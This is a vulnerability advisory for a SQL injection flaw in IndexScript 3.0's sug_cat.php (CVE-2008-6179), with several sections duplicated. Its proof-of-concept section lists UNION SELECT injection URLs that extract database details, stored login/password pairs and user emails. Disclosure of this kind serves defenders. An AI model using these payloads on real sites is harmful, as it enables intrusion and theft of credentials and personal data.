IndexScript 'sug_cat.php' SQL Injection Vulnerability
BID:31744
Info
IndexScript 'sug_cat.php' SQL Injection Vulnerability
| Bugtraq ID: | 31744 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6179 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 13 2008 12:00AM |
| Updated: | May 07 2015 05:22PM |
| Credit: | d3v1l |
| Vulnerable: |
IndexScript IndexScript 3.0 |
| Not Vulnerable: | |
Discussion
IndexScript 'sug_cat.php' SQL Injection Vulnerability
IndexScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
IndexScript 3.0 is vulnerable; other versions may also be affected.
IndexScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
IndexScript 3.0 is vulnerable; other versions may also be affected.
Exploit / POC
IndexScript 'sug_cat.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
Solution / Fix
IndexScript 'sug_cat.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
References
IndexScript 'sug_cat.php' SQL Injection Vulnerability
References:
References:
- IndexScript Web Site (IndexScript)